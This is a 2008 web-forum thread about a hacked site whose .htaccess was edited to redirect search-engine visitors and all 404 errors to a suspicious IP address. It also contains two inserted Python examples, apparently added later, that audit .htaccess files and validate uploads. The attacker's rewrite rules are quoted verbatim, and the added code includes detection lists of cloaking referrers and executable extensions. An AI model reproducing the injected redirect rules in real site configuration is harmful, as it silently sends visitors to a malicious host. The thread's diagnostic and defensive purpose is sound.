.htaccess Edited... but not by me!
Posted: Sat Jul 26, 2008 6:48 pm
by Chalks
Ok guys, I'd love to hear thoughts on this one. I had a very strange thing happen to me today. I found out that my .htaccess file had been edited by _someone_ to have this in it:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://87.248.180.88/in.html?s=hg_err
I'm not entirely sure what all of that means. However, I now know that all my 404s were getting redirected to 87.248.180.88 (which seems to be spam/virus-ey). I discovered this by almost pure chance. I've alerted my hosting provider, have changed all my passwords, and removed all the code that I could find. However, I'm _very_ curious as to how this got into my .htaccess file.
I would be _very_ surprised if someone had guessed my password since it's rather strong (8+ characters, capitalization thrown in and numbers/special chars).
I'm pretty sure that none of the php scripts on my server have access to this file, but I could be wrong (?).
Any ideas?
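The rules above are a classic referrer-cloaked redirect: only visitors arriving from a search engine (and anyone hitting a 404) get bounced to the attacker's host, so the owner browsing the site directly never notices. The script below is an added example, not code from the original post: it reads an .htaccess as text and flags RewriteRule/ErrorDocument targets that are absolute URLs to a host other than the site's own, plus RewriteRule lines gated on HTTP_REFERER conditions that name search engines. The sample input is the injected block from the post with two benign rules added; the site's own hostnames (example.com) and the search-engine word list are assumptions.

```python
"""Audit an Apache .htaccess for injected offsite / referrer-cloaked redirects.

Added example, not part of the original post. Findings are (line, kind, detail).
"""
import re
from urllib.parse import urlparse

# Constructed sample: the attacker's rules from the post, plus two benign
# rules (lines 7 and 8) that the audit must NOT flag.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://87.248.180.88/in.html?s=hg_err
RewriteRule ^old/(.*)$ /new/$1 [R=301,L]
ErrorDocument 500 /errors/500.html
"""

# Assumed list of referrer keywords that indicate search-engine cloaking.
SEARCH_ENGINE_WORDS = ("google", "aol", "msn", "altavista", "ask", "yahoo", "bing")


def _is_foreign_url(target, own_hosts):
    """True if target is an absolute http(s) URL whose host we do not own.

    Relative paths (/new/$1, /errors/500.html) are never 'foreign'.
    """
    p = urlparse(target)
    if p.scheme not in ("http", "https") or not p.hostname:
        return False
    return p.hostname.lower() not in own_hosts


def audit_htaccess(text, own_hosts=("example.com", "www.example.com")):
    """Scan .htaccess text; return a list of (lineno, kind, detail) findings."""
    findings = []
    own = {h.lower() for h in own_hosts}
    pending_referer_conds = []  # RewriteCond patterns waiting for their RewriteRule

    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()  # Apache directive names are case-insensitive

        if directive == "rewritecond" and len(parts) >= 3:
            # Only conditions on the referrer matter for cloaking detection.
            if "%{HTTP_REFERER}" in parts[1].upper():
                pending_referer_conds.append(parts[2])
            continue

        if directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]
            if _is_foreign_url(target, own):
                findings.append((lineno, "offsite-rewrite", target))
            # Conditions preceding this rule that key on search-engine referrers.
            cloak = [c for c in pending_referer_conds
                     if any(w in c.lower() for w in SEARCH_ENGINE_WORDS)]
            if cloak:
                findings.append((lineno, "referer-cloaking", ", ".join(cloak)))
            pending_referer_conds = []  # conditions bind to one rule only
            continue

        if directive == "errordocument" and len(parts) >= 3:
            target = parts[2]
            if _is_foreign_url(target, own):
                findings.append((lineno, "offsite-errordocument", target))

    return findings


if __name__ == "__main__":
    for lineno, kind, detail in audit_htaccess(SAMPLE_HTACCESS):
        print(f"line {lineno}: {kind}: {detail}")
```

Run it over every .htaccess under the document root (`find /var/www -name .htaccess`), not just the top-level one; an attacker who can write one can usually write others. A hit on offsite-errordocument is the detail the poster stumbled on by chance: every 404 leaves the site.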
Re: .htaccess Edited... but not by me!
Posted: Sat Jul 26, 2008 9:11 pm
by psychotomus
If any of your forms allow uploading, you need to check that they can only upload certain file types. I forgot to do this on one of my sites, and that uploaded a .js file and erased over 200 GB of data from my server. It took about 2 weeks to reupload it all.
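As an added example of the check this reply recommends (not the poster's code; written in Python as a stand-in for what a PHP upload handler would do), the function below accepts a file only if its name passes an extension allowlist and its first bytes match the magic number for that extension. It rejects dotfiles such as .htaccess, anything the server might execute, and double extensions like shell.php.jpg. The allowlist, the magic-byte table and the dangerous-extension set are assumptions to adapt to the site.

```python
"""Server-side upload type check: allowlist by extension AND by content.

Added example, not from the original thread. Never trust the client's
Content-Type or the raw filename; decide from the name you normalise here
and the bytes you actually received.
"""
import os

# Assumed allowlist: extension -> magic-byte prefixes a genuine file starts with.
ALLOWED_TYPES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

# Assumed set of extensions Apache/PHP might execute or honour under the docroot.
DANGEROUS_EXTENSIONS = {
    "php", "php3", "php4", "php5", "phtml", "phar",
    "cgi", "pl", "py", "sh", "js", "htaccess",
}


def check_upload(filename, data):
    """Return (ok, reason). ok is True only if both name and content pass."""
    # Drop any directory part the client sent (../../x.png -> x.png).
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or base.startswith("."):
        return False, "dotfile or empty name (e.g. .htaccess)"

    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "no extension"

    # Every extension in the name must be safe: shell.php.jpg fails here,
    # because some Apache setups run a file on ANY .php segment of the name.
    exts = parts[1:]
    for e in exts:
        if e in DANGEROUS_EXTENSIONS:
            return False, f"dangerous extension .{e}"

    ext = exts[-1]
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} not in allowlist"

    # Content must look like the claimed type: a PHP script renamed to .jpg
    # does not start with the JPEG marker.
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, f"content does not look like .{ext}"

    return True, "ok"


if __name__ == "__main__":
    # Constructed samples, not real uploads.
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    for name, body in [("photo.jpg", jpeg), ("shell.php.jpg", jpeg),
                       (".htaccess", b"RewriteEngine On"),
                       ("payload.js", b"alert(1)"), ("fake.jpg", b"<?php evil(); ?>")]:
        print(name, check_upload(name, body))
```

Even with this check, store uploads outside the document root (or in a directory where script execution is disabled) and serve them through a handler that sets the Content-Type itself; the allowlist stops the obvious cases, it does not make the upload directory a safe place to execute from.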
Re: .htaccess Edited... but not by me!
Posted: Sat Jul 26, 2008 9:43 pm
by Chris Corbyn
Are you on a shared host? It's possible that all users run PHP under the same userid which is a big security risk.
Re: .htaccess Edited... but not by me!
Posted: Sun Jul 27, 2008 9:22 am
by volomike
Check to see if something you did in your shared hosting control panel (if you used shared hosting) did this to you. If not, then you need to go to your web hosting provider to ask if they have an answer. If they don't have an answer, then yeah, you might have been hacked. They don't need to know your password -- there are exploits in certain packages and certain versions of Apache 1.5 and 2. You have to ensure your stuff is patched and up to date. Usually that's the job of your web hosting provider. So, for instance, if I were hacked on a shared host, I'd ensure I had good backups, find the one that worked, complain to my web hosting provider to keep the systems secure, and once everything was good again, I'd reupload my stuff from backup.
If it's mission critical, some people go this route. They use a separate DNS system like moniker.com to purchase their domains and host the DNS record for them. Then, they point them to a web hosting provider. They then get a completely separate but compatible web hosting provider that can also rehost their stuff and leave that out there for the time being. In the event of something like this, they just go to moniker.com and repoint their domain to the backup web host in order to have their stuff come back online quickly. In the meantime, the site owner (you) would then split up all the sites s/he owns across these two web hosts. When one starts to have trouble, they can move some or all the domains to the other.
Re: .htaccess Edited... but not by me!
Posted: Sat Oct 25, 2008 7:21 am
by VladSun
volomike wrote: They use a separate DNS system like moniker.com to purchase their domains and host the DNS record for them. Then, they point them to a web hosting provider. They then get a completely separate but compatible web hosting provider that can also rehost their stuff and leave that out there for the time being. In the event of something like this, they just go to moniker.com and repoint their domain to the backup web host in order to have their stuff come back online quickly.
It's true only if the TTL for DNS records is set to a very low value (e.g. 1 hour), which is really rarely seen at DNS registrars.
The TTL is usually set to 86400, i.e. 1 day.
Also, most of the sites use a DB server - it should be synchronized with the "new" one.
Re: .htaccess Edited... but not by me!
Posted: Mon Oct 27, 2008 9:21 am
by panic!
manialix wrote: Yes, 100% agreed with Chris Corbyn. It's a big security risk.
I like how you signed up just to agree with someone haha.
